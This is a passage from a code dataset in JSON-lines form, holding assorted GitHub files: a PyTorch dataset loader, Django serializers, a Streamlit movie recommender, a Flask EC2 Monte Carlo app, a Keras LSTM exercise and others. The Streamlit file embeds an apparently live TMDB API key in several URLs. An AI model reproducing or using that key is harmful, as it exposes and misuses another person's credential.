self._strings_to_list(train_mr, train_ref)\n with open(os.path.join(self.root, self.processed_folder, self._train_file), 'wb') as f:\n torch.save(train_list, f)\n\n print('\\tdev set')\n dev_list = self._strings_to_list(dev_mr, dev_ref)\n with open(os.path.join(self.root, self.processed_folder, self._dev_file), 'wb') as f:\n torch.save(dev_list, f)\n\n print('\\ttest set')\n test_list = self._strings_to_list(test_mr, test_ref)\n with open(os.path.join(self.root, self.processed_folder, self._test_file), 'wb') as f:\n torch.save(test_list, f)\n\n print('Merging the 3 sets in an all_in_one file')\n all_in_one_list = self._strings_to_list(all_in_one_mr, all_in_one_ref)\n with open(os.path.join(self.root, self.processed_folder, self._all_in_one_file), 'wb') as f:\n torch.save(all_in_one_list, f)\n\n # Store the right list in local fields\n options = {\n E2ESet.TRAIN: train_list,\n E2ESet.DEV: dev_list,\n E2ESet.TEST: test_list,\n E2ESet.ALL_IN_ONE: all_in_one_list\n }\n self.mr, self.ref = [list(z) for z in zip(*options[self.which_set])]\n\n # Save the dictionary\n print('Saving the dictionary')\n with open(os.path.join(self.root, self.processed_folder, self._vocabulary_file), 'wb') as f:\n torch.save(self.vocabulary, f)\n\n print('Done!')\n\n def _strings_to_list(self, meaning_representations: List[str], references: List[str]) -> List[List[List[int]]]:\n examples = []\n for mr, ref in zip(meaning_representations, references):\n mr = self.vocabulary.add_sentence(mr)\n ref = self.vocabulary.add_sentence(ref)\n examples.append([mr, ref])\n examples.sort(key=lambda e: len(e[0]))\n return examples\n\n def sort(self):\n \"\"\"Sorts the examples by mr\"\"\"\n data_zip = list(zip(self.mr, self.ref))\n data_zip.sort(key=lambda example: example[0])\n unzip = list(zip(*data_zip))\n self.mr = list(unzip[0])\n self.ref = list(unzip[1])\n\n def to_string(self, tensor: Union[torch.Tensor, list]):\n if type(tensor) is torch.Tensor:\n tensor = tensor.squeeze().tolist()\n return self.vocabulary.to_string(tensor)\n\n def vocabulary_size(self) -> int:\n return len(self.vocabulary)\n\n\ndef _contains_all(folder, files) -> bool:\n file_exist = [os.path.exists(os.path.join(folder, f)) for f in files]\n return reduce(lambda a, b: a and b, file_exist)\n\n\ndef _extract_mr_ref(file) -> Tuple[List[str], List[str]]:\n print('Processing {}'.format(file))\n mr = []\n ref = []\n with open(file, 'r') as csv_file:\n reader = csv.reader(csv_file, delimiter=',')\n next(reader)\n for row in reader:\n mr.append(row[0])\n ref.append(row[1])\n return mr, ref\n","repo_name":"marco-roberti/pytorch-e2e-dataset","sub_path":"e2e.py","file_name":"e2e.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"31312268406","text":"from rest_framework import fields, serializers\n\nfrom products.models import Basket, Product, ProductCategory\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n \"\"\"Сериализация продуктов на основе модели.\"\"\"\n # queryset используется, так как в модели продукта категория идет как обязательное поле\n category = serializers.SlugRelatedField(\n queryset=ProductCategory.objects.all(),\n slug_field='name'\n )\n\n class Meta:\n model = Product\n fields = (\n 'id',\n 'name',\n 'description',\n 'price',\n 'quantity',\n 'image',\n 'category'\n )\n\n\nclass BasketSerializer(serializers.ModelSerializer):\n \"\"\"Сериализация корзины.\"\"\"\n # Чтобы в JSON вместо id товара выдавать словарь с полной информацией о товаре\n product = ProductSerializer()\n # Чтобы добавить сумму однотипных товаров, используя метод из модели Product\n sum = fields.FloatField(required=False)\n # Указывается, чтобы после Meta его описать\n total_sum = fields.SerializerMethodField()\n total_quantity = fields.SerializerMethodField()\n\n class Meta:\n model = Basket\n fields = (\n 'id',\n 'product',\n 'quantity',\n 'total_quantity',\n 'sum',\n 'created_timestamp',\n 'total_sum'\n )\n read_only_fields = ('created_timestamp',)\n\n def get_total_sum(self, obj):\n \"\"\"Получаем корзину данного пользователя и заносим итоговую сумму.\"\"\"\n return Basket.objects.filter(user_id=obj.user.id).total_sum()\n\n def get_total_quantity(self, obj):\n \"\"\"Получаем корзину данного польз��вателя и заносим количество товаров.\"\"\"\n return Basket.objects.filter(user_id=obj.user.id).total_quantity()\n","repo_name":"DanilovKZN/garden_shop","sub_path":"store/products/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18538521045","text":"# 트리의 부모 찾기 S2\nimport sys\n\nsys.setrecursionlimit(10 ** 9)\n\ninput = sys.stdin.readline\nn = int(input())\ntree = [[] for i in range(n + 1)]\n\nfor i in range(n - 1):\n a, b = map(int, input().split())\n tree[a].append(b)\n tree[b].append(a)\n\nvisited = [False] * (n + 1)\nparent = [0] * (n + 1)\n\n\ndef dfs(node):\n visited[node] = True\n for i in tree[node]: # node와 연결된 노드 방문\n if not visited[i]: # 미방문한 노드이면\n visited[i] = True # 방문 처리\n parent[i] = node # i 노드의 부모는 node가 됨\n dfs(i) # 재귀적으로 진행\n\n\ndfs(1)\n\nfor i in range(2, n + 1):\n print(parent[i])\n","repo_name":"kkm0406/AlgorithmBOJ","sub_path":"트리/11725.py","file_name":"11725.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7521338040","text":"import os\n\nimport pybibs\n\n\ndef test_read_then_write_produces_the_same_result():\n filepath = os.path.join('tests', 'data', 'huge.bib')\n bib1 = pybibs.read_file(filepath)\n out1 = pybibs.write_string(bib1)\n bib2 = pybibs.read_string(out1)\n out2 = pybibs.write_string(bib2)\n assert out1 == out2\n","repo_name":"Nagasaki45/pybibs","sub_path":"tests/io_cycle_test.py","file_name":"io_cycle_test.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28499951328","text":"# to make website for movie recommender system\nimport streamlit as st\nimport pickle\nimport pandas as pd\nimport requests\n\n# tmdb image path\n# https://image.tmdb.org/t/p/w500/kqjL17yufvn9OVLyXYpvtyrFfak.jpg\n# [ poster path ]\n# json viewer\n# http://jsonviewer.stack.hu/#http://api.themoviedb.org/3/movie/550?api_key=f16b6d84f95d8ac3d06ae5384823f2e4\n# returns json file\n# https://api.themoviedb.org/3/movie/550?api_key=f16b6d84f95d8ac3d06ae5384823f2e4\n# api provide movie id | api key |\n\n\ndef fetch_poster(movie_id):\n response = requests.get(\n 'https://api.themoviedb.org/3/movie/{}?api_key=f16b6d84f95d8ac3d06ae5384823f2e4&language=en-US'.format(\n movie_id))\n data = response.json()\n return \"https://image.tmdb.org/t/p/w500\" + data['poster_path']\n\n\ndef recommend(movie):\n recommended_movies = []\n recommended_movies_poster = []\n movie_index = movies[movies['title'] == movie].index[0]\n distances = similarity[movie_index]\n movies_list = sorted(list(enumerate(distances)), reverse=True, key=lambda x: x[1])[1:6]\n\n for i in movies_list:\n movie_id = movies.iloc[i[0]].movie_id\n recommended_movies.append(movies.iloc[i[0]].title)\n recommended_movies_poster.append(fetch_poster(movie_id))\n return recommended_movies, recommended_movies_poster\n\n\nmovies_dict = pickle.load(open('movies.pkl', 'rb'))\nmovies = pd.DataFrame(movies_dict)\nsimilarity = pickle.load(open('similarity', 'rb'))\n\n# Title display\nst.title('Movie Recommender System')\n\n# add a text box for user to enter movie name\n# we can type the movie name or select from drop down list\nselected_movie_name = st.selectbox(\n 'How would you like to get recommended?',\n movies['title'].values)\n\nif st.button('Recommend'):\n names, posters = recommend(selected_movie_name)\n col1, col2, col3, col4, col5 = st.columns(5)\n\n with col1:\n st.text(names[0])\n st.image(posters[0])\n with col2:\n st.text(names[1])\n st.image(posters[1])\n with col3:\n st.text(names[2])\n st.image(posters[2])\n with col4:\n st.text(names[3])\n st.image(posters[3])\n with col5:\n st.text(names[4])\n st.image(posters[4])\n","repo_name":"Raunak-Kumar7/Movie-Recommender-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75009345443","text":"#!/usr/bin/env python\n\nimport argparse # noqa\n\nimport logging\nimport os\n\nimport redis\n\nfrom docker_registry.lib import layers\nfrom docker_registry.lib import rlock\nfrom docker_registry.lib import rqueue\nimport docker_registry.storage as storage\n\nstore = storage.load()\n\nredis_default_host = os.environ.get(\n 'DOCKER_REDIS_1_PORT_6379_TCP_ADDR',\n '0.0.0.0')\nredis_default_port = int(os.environ.get(\n 'DOCKER_REDIS_1_PORT_6379_TCP_PORT',\n '6379'))\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(\n description=\"Daemon for computing layer diffs\"\n )\n parser.add_argument(\n \"--rhost\", default=redis_default_host, dest=\"redis_host\",\n help=\"Host of redis instance to listen to\",\n )\n parser.add_argument(\n \"--rport\", default=redis_default_port, dest=\"redis_port\", type=int,\n help=\"Port of redis instance to listen to\",\n )\n parser.add_argument(\n \"-d\", \"--database\", default=0, dest=\"redis_db\",\n type=int, metavar=\"redis_db\",\n help=\"Redis database to connect to\",\n )\n parser.add_argument(\n \"-p\", \"--password\", default=None, metavar=\"redis_pw\", dest=\"redis_pw\",\n help=\"Redis database password\",\n )\n return parser\n\n\ndef get_redis_connection(options):\n redis_conn = redis.StrictRedis(\n host=options.redis_host,\n port=options.redis_port,\n db=options.redis_db,\n password=options.redis_pw,\n )\n return redis_conn\n\n\ndef handle_request(layer_id, redis_conn):\n '''handler for any item pulled from worker job queue\n\n This handler is called every time the worker is able to pop a message\n from the job queue filled by the registry. The worker blocks until a\n message is available. This handler will then attempt to aquire a lock\n for the provided layer_id and if successful, process a diff for the\n layer.\n\n If the lock for this layer_id has already been aquired for this layer\n the worker will immediately timeout to block for another request.\n '''\n try:\n # this with-context will attempt to establish a 5 minute lock\n # on the key for this layer, immediately passing on LockTimeout\n # if one isn't availble\n with rlock.Lock(redis_conn,\n \"diff-worker-lock\",\n layer_id,\n expires=60 * 5):\n # first check if a cached result is already available. The registry\n # already does this, but hey.\n diff_data = layers.get_image_diff_cache(layer_id)\n if not diff_data:\n log.info(\"Processing diff for %s\" % layer_id)\n layers.get_image_diff_json(layer_id)\n except rlock.LockTimeout:\n log.info(\"Another worker is processing %s. Skipping.\" % layer_id)\n\nif __name__ == '__main__':\n parser = get_parser()\n options = parser.parse_args()\n redis_conn = get_redis_connection(options)\n # create a bounded queue holding registry requests for diff calculations\n queue = rqueue.CappedCollection(redis_conn, \"diff-worker\", 1024)\n # initialize worker factory with the queue and redis connection\n worker_factory = rqueue.worker(queue, redis_conn)\n # create worker instance with our handler\n worker = worker_factory(handle_request)\n log.info(\"Starting worker...\")\n worker()\n","repo_name":"docker-archive/docker-registry","sub_path":"scripts/diff-worker.py","file_name":"diff-worker.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":2881,"dataset":"github-code","pt":"52"} +{"seq_id":"37796107216","text":"import unittest\n\nimport pyomo.environ as pyomo\nimport pytest\nfrom pyomo.opt import SolverStatus\n\nfrom mpa.utilities.model_utils import solve_model\n\n\n@pytest.mark.skip(\n reason=\"To be implemented. Requires solver to be installed to test vm\"\n)\nclass TestModelUtils(unittest.TestCase):\n def test_solve_model_with_gurobi(self):\n # Create a simple Pyomo ConcreteModel\n model = pyomo.ConcreteModel()\n model.x = pyomo.Var()\n model.obj = pyomo.Objective(expr=model.x)\n model.constraint = pyomo.Constraint(expr=model.x >= 1)\n\n # Solve the model using the Gurobi solver\n results = solve_model(model, solver=\"gurobi\")\n\n # Check that the solver status is ok\n self.assertEqual(results.solver.status, SolverStatus.ok)\n\n # Check that the optimal solution was found\n self.assertEqual(\n results.solver.termination_condition, pyomo.TerminationCondition.optimal\n )\n\n def test_solve_model_with_timelimit(self):\n ...\n\n def test_solve_model_with_mipgap(self):\n ...\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"MartinBoge/au-mpa","sub_path":"test/unit/utilities/test_model_utils.py","file_name":"test_model_utils.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12324010330","text":"# coding=utf-8\n# 代码文件:ch13/ch13_4.py\n\nimport wx\n\n# 自定义窗口类MyFrame\nclass MyFrame(wx.Frame):\n def __init__(self):\n super().__init__(None, title=\"第一个wxPython程序!\", size=(400, 300), pos=(100, 100))\n # 你的代码\n\n\n# 创建应用程序对象\napp = wx.App()\n\n# 创建窗口对象\nfrm = MyFrame()\n# 显示窗口\nfrm.Show()\n\n# 进入主事件循环\napp.MainLoop()\n","repo_name":"vvright/LearningPython","sub_path":"tutorial/comic_py/ch13/ch13_4.py","file_name":"ch13_4.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33427552601","text":"import os\nimport logging\nimport math\nimport random\nimport http.client\nimport pandas as pd\nimport json\nimport parallel\nimport ec2_functions\nimport ec2_start_stop\nimport ast\nimport time\n\n\nfrom flask import Flask, request, render_template\n\napp = Flask(__name__)\n# invoke url: https:##################.us-east-1.amazonaws.com/default\n# various Flask explanations available at: https://flask.palletsprojects.com/en/1.1.x/quickstart/\n\ndef doRender(tname, values={}):\n\tif not os.path.isfile( os.path.join(os.getcwd(), 'templates/'+tname) ): #No such file\n\t\treturn render_template('index.htm')\n\treturn render_template(tname, **values) \n\n\n# Defines a POST supporting estimate route\n@app.route('/estimate', methods=['POST'])\ndef estimateHandler():\n\tif request.method == 'POST':\n\t\tscale= request.form.get('service')\n\t\tr = request.form.get('parallel-resources')\n\t\td = request.form.get('digits')\n\t\ts = request.form.get('shots')\n\t\tq = request.form.get('q')\n\t\tif scale == '' or r == '' or d=='' or s=='' or q=='':\n\t\t\treturn doRender('index.htm',{'note': 'Please specify a number for each group!'})\n\t\telse:\n\t\t\tr=int(r)\n\t\t\td=int(d)\n\t\t\ts=int(s)\n\t\t\tq=int(q)\n\t\t\tif scale==\"lambda\":\n\t\t\t\tservice=\"lambda\"\n\t\t\t\tresults=parallel.main(r,d,s,q)\n\t\t\t\tthresh=results[2]\n\t\t\t\ttime_taken=results[3]\n\t\t\t\ttotal_cost=parallel.cost_estimate_lambda(time_taken,thresh)\n\t\t\t\tprint(\"time taken:\",time_taken)\n\t\t\tif scale==\"ec2\":\n\t\t\t\tservice=\"EC2\"\n\n\t\t\t\t# We start r instances from the ami image\n\t\t\t\tstart=time.time()\n\t\t\t\tinstances=ec2_start_stop.create(r)\n\n\t\t\t\t# Getting all the instance-ids of the newly created instances\n\t\t\t\tec2_con_re=ec2_start_stop.get_ec2_for_my_region()\n\t\t\t\tlist_inst_id=ec2_start_stop.list_instances_on_my_region(ec2_con_re)\n\t\t\t\t#print(list_inst_id)\n\n\t\t\t\t# Now we need to get the public ip address of all the instance after they have started\n\n\t\t\t\t# Waiting for all instances to be running\n\t\t\t\tfor in_id in list_inst_id:\n\t\t\t\t\tec2_start_stop.start_instance(ec2_con_re,in_id)\n\n\t\t\t\t#getting public ip of all instances\n\t\t\t\tlist_public_ip=ec2_start_stop.get_public_ip(list_inst_id)\n\t\t\t\t\n\t\t\t\tresults=ec2_functions.main(r,d,s,q,list_public_ip)\n\n\t\t\t\t# terminating all instances\n\t\t\t\tec2_start_stop.stop(list_inst_id)\n\t\t\t\ttotal_time=time.time()-start\n\t\t\t\ttotal_cost=parallel.cost_estimate_EC2(total_time)\n\t\t\t\t#print(\"time taken:\",total_time)\n\t\t\ty=results[0]\n\t\t\tpivalue=[]\n\t\t\tfor val in y:\n\t\t\t\tpivalue.append(str(val))\n\t\t\tpivalue=','.join(pivalue)\n\t\t\tpi=math.floor(math.pi * 10 ** (d-1))/ 10 ** (d-1)\n\t\t\ty1=[]\n\t\t\tfor i in range(0,len(y)):\n\t\t\t\ty1.append(str(pi))\n\t\t\ty1=','.join(y1)\n\t\t\tdata1=results[1]\n\t\t\tparallel.toS3(1,s,q,d,r,results[-1],total_cost,service)\n\t\t\treturn render_template('chart.htm',tables=[data1.to_html(classes='data', header=\"true\")],y=pivalue,y1=y1,pi=results[-1],cost=total_cost)\n\treturn 'Should not ever get here'\n\n@app.route('/history',methods=['POST'])\ndef history_handler():\n data=parallel.fromS3()\n result=json.loads(data)\n data=[]\n for each in result:\n data.append(json.loads(each))\n tab = pd.DataFrame.from_dict(data)\n return render_template('history.htm',tables=[tab.to_html(classes='data', header=\"true\")])\n \n@app.route('/terminate',methods=['POST']) \ndef terminate_handler():\n ec2_con_re=ec2_start_stop.get_ec2_for_my_region()\n list_inst_id=ec2_start_stop.list_instances_on_my_region(ec2_con_re)\n #print(list_inst_id)\n ec2_start_stop.terminate(list_inst_id)\n return doRender('index.htm',{'note1': 'Instances now terminated'})\n \n\n# catch all other page requests - doRender checks if a page is available (shows it) or not (index)\n@app.route('/', defaults={'path': ''})\n@app.route('/')\ndef mainPage(path):\n\treturn doRender(path)\n\n@app.errorhandler(500)\n# A small bit of error handling\ndef server_error(e):\n\tlogging.exception('ERROR!')\n\treturn \"\"\"\n\tAn error occurred:
{}
\n\t\"\"\".format(e), 500\n\nif __name__ == '__main__':\n\t# Entry point for running on the local machine\n\t# On GAE, endpoints (e.g. /) would be called.\n\t# Called as: gunicorn -b :$PORT index:app,\n\t# host is localhost; port is 8080; this file is index (.py)\n\tapp.run(host='127.0.0.1', port=8080, debug=True)\n","repo_name":"BhavyasreeS/Multicloud_Flask_Application","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72477991524","text":"CELERY_IMPORTS = (\"firemanager.tasks\", )\n\nBROKER_URL = 'sqla+sqlite:////tmp/celery-broker.sqlite'\n\nCELERY_RESULT_BACKEND = \"database\"\nCELERY_RESULT_DBURI = 'sqlite:////tmp/celery-backend.sqlite'\nCELERY_TASK_RESULT_EXPIRES = 604800 # 1 weak.\n\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\n#CELERY_TIMEZONE = 'Europe/Oslo'\nCELERY_ENABLE_UTC = True\n\n## Enables error emails.\nCELERY_SEND_TASK_ERROR_EMAILS = True\n#\n## Name and email addresses of recipients\nADMINS = (\n (\"SupeHero\", \"batman@superman.me\"),\n)\n#\n## Email address used as sender (From field).\nSERVER_EMAIL = \"batman@superman.me\"\n#\n## Mailserver configuration\nEMAIL_HOST = \"127.0.0.1\"\nEMAIL_PORT = 25\n## EMAIL_HOST_USER = \"servers\"\n## EMAIL_HOST_PASSWORD = \"s3cr3t\"\n","repo_name":"greggyNapalm/firebat-manager","sub_path":"firemanager/celeryconfig.py","file_name":"celeryconfig.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73810265764","text":"import numpy as np #pd는 np로 구성되어있다\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, SimpleRNN, LSTM, Bidirectional, Dropout, GRU\nfrom tensorflow.python.keras.utils.metrics_utils import result_wrapper\nimport tensorflow as tf\nimport numpy as np\nimport time\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler, RobustScaler, MaxAbsScaler\n\n\n#1. 데이터\na = np.array(range(1,101))\n# print(a) #[ 1 2 3 4 5 6 7 8 9 10 ... 100]\n# print(a.shape) #(10,)\nx_predict = np.array(range(96, 106))\nprint(x_predict) #[ 96 97 98 99 100 101 102 103 104 105]\n\nsize = 5 # x 4개 ,y 1개\n\ndef split_x(dataset, size):\n aaa = []\n for i in range(len(dataset)- size + 1 ):\n subset = dataset[i : (i + size)]\n aaa.append(subset)\n return np.array(aaa)\n\ndataset = split_x(a, size)\n\nx = dataset[:,:-1] \ny = dataset[:, -1] \n\nx_predict = split_x(x_predict,size)\nx_predict_x = x_predict[:,:-1] \nprint(x_predict_x)\nprint(x_predict_x.shape)\n\n\nx_predict_x = x_predict_x.reshape(6,4,1)\n\n# scaler = MinMaxScaler()\n# #scaler = StandardScaler()\n# #scaler = RobustScaler()\n# #scaler = MaxAbsScaler()\n# scaler.fit(x)\n# x = scaler.transform(x)\n# # x_test = scaler.transform(x_test)\n# x = x.reshape(13, 3, 1)\n# x = dataset[:,:-1].reshape(96, 4, 1) \n\n\n#2. 모델구성\nmodel = Sequential()\nmodel.add(LSTM(30, input_shape=(4, 1), return_sequences=True)) \n# model.add(LSTM(30, return_sequences=True))\n# model.add(LSTM(30, return_sequences=True))\nmodel.add(LSTM(10)) # 마지막은 return_sequence X\nmodel.add(Dense(16, activation='relu'))\n# model.add(Dropout(0.1))\n# model.add(Dense(8, activation='linear'))\nmodel.add(Dense(4, activation='linear'))\n# model.add(Dropout(0.1))\n# model.add(Dense(2, activation='linear'))\n# model.add(Dropout(0.1))\nmodel.add(Dense(4))\n#model.summary()\n\n\n#3. 컴파일, 훈련\n\nmodel.compile(loss='mse', optimizer='adam')\n\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nes = EarlyStopping(monitor='val_loss', patience= 2 , mode = 'auto', verbose=1, restore_best_weights=True)\n\nstart = time.time()\nmodel.fit(x_predict_x, y, epochs=10, batch_size=10, verbose=1, validation_split=0.1, callbacks=[es])\nend = time.time()- start\n\nprint(\"걸린시간 : \", round(end, 3), '초')\n\n\n#4. 평가,예측\nloss = model.evaluate(x_predict,y)\ny_pred = model.predict(x_predict)\n\n\ny_predict = model.predict(x_predict_x)\n# y_pred = y_predict.reshape(10,)\n#results=results.round(0).astype(int)\nprint(y_pred)\n\n","repo_name":"jangsejong/STUDY","sub_path":"keras/keras37_38RNN_LSTM/keras41_split2_LSTM.py","file_name":"keras41_split2_LSTM.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21208001726","text":"import pandas as pd\n\nimport output\nfrom args import parse_args\nfrom benchmarking import BenchmarkSuite\n\n\ndef main():\n args = parse_args()\n\n testing_suite = BenchmarkSuite(args.capsule_dir, args.parallelism)\n results = testing_suite.test(args.num_samples)\n\n df = pd.DataFrame.from_records(results,\n columns=BenchmarkSuite.Result._fields)\n df.sort_values(by=list(df.columns), inplace=True, ignore_index=True)\n\n output.generate_output(\n output=df,\n csv_path=args.output_csv,\n graph_path=args.output_graph\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"opencv/open_vision_capsules","sub_path":"tools/openvisioncapsule_tools/capsule_benchmark/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"52"} +{"seq_id":"71049713446","text":"#!/usr/bin/env python2.7\n'''Svn diff conversion to html'''\n\n# pylint: disable-msg=E0611\n\nimport jinja2\nimport sys\nfrom pygments import highlight\nfrom pygments.lexers import DiffLexer\nfrom pygments.formatters import HtmlFormatter\n\n\ndef main(tmpfile):\n '''For commandline usage\n $ svndiff2html.py mydiff_file'''\n f = open(tmpfile,'r')\n mydiff = f.read()\n f.close()\n hdiff = highlight_diff(mydiff)\n page = create_page(hdiff)\n write(page)\n\ndef highlight_diff(fd):\n '''Parse the diff, create html string, and return the diff'''\n htmldiff = highlight(fd, DiffLexer(), HtmlFormatter(linenos=True))\n return htmldiff\n\ndef create_page(diff, title='Svn diff'):\n '''Take a html diff string and create a complete page\n and returns it'''\n env = jinja2.Environment(loader=jinja2.FileSystemLoader('./', encoding='utf-8'))\n template = env.get_template('svndiff2html.tpl')\n return template.render({'title': title\n , 'scripts': []\n , 'styles': ['svndiff2html.css']\n , 'diff': diff})\n\ndef create_css(outfile='svndiff2html.css'):\n '''Create css file'''\n f = open('svndiff2html.css', 'w')\n f.write(HtmlFormatter().get_style_defs('.highlight'))\n f.close()\n\ndef write(diff, outfile='diff.html'):\n '''Write the diff out to a file'''\n f = open(outfile, 'w')\n f.write(diff)\n f.close()\n\n\nif __name__ == '__main__':\n main(sys.argv[1])\n create_css()\n\n\n","repo_name":"chauncey/svndiff2html","sub_path":"svndiff2html.py","file_name":"svndiff2html.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25691728701","text":"from collections import defaultdict, Counter\n\nimport functools\n\ndef parse_file(filename):\n patterns = []\n outputs = []\n with open(filename, 'r') as f:\n for line in f:\n l = line.split('|')\n p = l[0].strip().split()\n o = l[1].strip().split()\n patterns.append(p)\n outputs.append(o)\n\n return (patterns,outputs)\n\n\ndef part1(filename):\n patterns,outputs = parse_file(filename)\n ans = 0\n for o in outputs:\n for x in o:\n l = len(x)\n if l == 2 or l == 4 or l == 3 or l == 7:\n ans += 1\n\n print(f'ANSWER: {ans}')\n\n\nall_segments = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\ndef make_map():\n segment_map = {}\n for s in all_segments:\n segment_map[s] = set(all_segments[:])\n return segment_map\n\n\ndef observe(m, segments, possibilities):\n possibilities = set(possibilities)\n for segment in segments:\n m[segment] &= possibilities\n\n collapse(m)\n\ndef collapse(m):\n diff = True\n while diff:\n diff = False\n for segment in all_segments:\n if len(m[segment]) == 1:\n eliminated = next(iter(m[segment]))\n for o in all_segments:\n if o != segment and eliminated in m[o]:\n m[o].remove(eliminated)\n diff = True\n\n\ndef map_digit(map, digit):\n mapped = ''\n for c in digit:\n mapped += next(iter(map[c]))\n return mapped\n\n\ndef decode(map, digit):\n mapped = map_digit(map, digit)\n digits = {\n 'abcefg': 0,\n 'cf': 1,\n 'acdeg': 2,\n 'acdfg': 3,\n 'bcdf': 4,\n 'abdfg': 5,\n 'abdefg': 6,\n 'acf': 7,\n 'abcdefg': 8,\n 'abcdfg': 9,\n }\n for c in digits:\n if set(mapped) == set(c):\n return digits[c]\n\n\ndef count_segments(patterns):\n cnt = Counter()\n for pattern in patterns:\n cnt.update(pattern)\n return cnt\n\n\ndef part2(filename):\n patterns,outputs = parse_file(filename)\n ans = 0\n for ps,digits in zip(patterns,outputs):\n segment_map = make_map()\n\n patterns_by_len = defaultdict(list)\n for pattern in ps:\n patterns_by_len[len(pattern)].append(pattern)\n\n for pattern_len, p in patterns_by_len.items():\n if pattern_len == 2:\n for pattern in p:\n observe(segment_map, pattern, 'cf')\n elif pattern_len == 3:\n for pattern in p:\n observe(segment_map, pattern, 'acf')\n elif pattern_len == 4:\n for pattern in p:\n observe(segment_map, pattern, 'bcdf')\n elif pattern_len == 5:\n segment_cnt = count_segments(p)\n for segment, cnt in segment_cnt.items():\n if cnt == 1:\n observe(segment_map, segment, 'eb')\n elif cnt == 2:\n observe(segment_map, segment, 'cf')\n elif pattern_len == 6:\n segment_cnt = count_segments(p)\n for segment, cnt in segment_cnt.items():\n if cnt == 2:\n observe(segment_map, segment, 'cde')\n\n a = ''\n for o in digits:\n i = str(decode(segment_map, o))\n a += i\n a = int(a)\n ans += a\n\n print(f'ANSWER: {ans}')\n\n\npart2('example.txt')\n","repo_name":"thekidder/adventofcode","sub_path":"2021/day8/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6783799310","text":"from django.conf.urls import url\n\nfrom .views import (WeightAllGardensView, WeightGardenDetails, WeightIndex,\n VolumeAllGardensView, VolumeGardenDetails, VolumeIndex)\n\n\nurlpatterns = [\n\n #\n # Weight\n #\n\n url(r'^weight/(?:(?P\\d{4})/)?$',\n WeightIndex.as_view(),\n name='compostproduction_weight_index'\n ),\n\n\n # Garden lists\n\n url(r'^weight/recorded/(?:(?P\\d{4})/)?$',\n WeightAllGardensView.as_view(),\n name='compostproduction_weight_all_gardens'\n ),\n\n\n # Garden details\n\n url(r'^weight/gardens/(?P\\d+)/(?:(?P\\d{4})/)?$',\n WeightGardenDetails.as_view(),\n name='compostproduction_weight_garden_details',\n ),\n\n\n #\n # Volume\n #\n\n url(r'^volume/(?:(?P\\d{4})/)?$',\n VolumeIndex.as_view(),\n name='compostproduction_volume_index'\n ),\n\n\n # Garden lists\n\n url(r'^volume/recorded/(?:(?P\\d{4})/)?$',\n VolumeAllGardensView.as_view(),\n name='compostproduction_volume_all_gardens'\n ),\n\n\n # Garden details\n\n url(r'^volume/gardens/(?P\\d+)/(?:(?P\\d{4})/)?$',\n VolumeGardenDetails.as_view(),\n name='compostproduction_volume_garden_details',\n ),\n\n]\n","repo_name":"ebrelsford/Farming-Concrete","sub_path":"barn/metrics/compost/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"4926569600","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom sqladmin import Admin\n\nfrom config.conf import settings\nfrom config.database import engine, create_tables\n\nfrom api.endpoints.api_router import api_router\nfrom api.endpoints.admin.admin_views import ProfileAdmin\n\napp = FastAPI(\n openapi_url=\"/api/v1/\",\n docs_url=\"/api/v1/docs/\",\n redoc_url=\"/api/v1/redoc/\",\n\n title=\"IVAN'S PYTHON\",\n description=\"API's for Ivan's lesson\",\n version=\"0.1\",\n)\n\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=settings.BACKEND_CORS_ORIGINS,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await 